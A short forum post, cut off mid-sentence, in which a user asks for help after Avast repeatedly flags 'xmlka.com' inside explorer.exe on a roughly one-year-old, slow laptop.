Xmlka.com Explorer.exe infected?!

So I just installed avast today and couple hours later, I start getting “Threat detected: Xmlka.com/blablablbahblABblabla
I’ve also learned that this is also the reason my laptop has been running slow before.
The laptop isn’t old, got it December 25, 2013 so it’s a year and a couple days old so age shouldn’t be a problem.
My problems are:

•Multiple “xmlka.com” within explorer.exe detections, like 1 every 5 seconds. (hyperbole but you get the idea)
•Slow laptop, due to this

How do I fix this?

All help is appreciated.

(I also checked out a couple other of threads about problems similar to this but they had codes that only worK for their computer such as
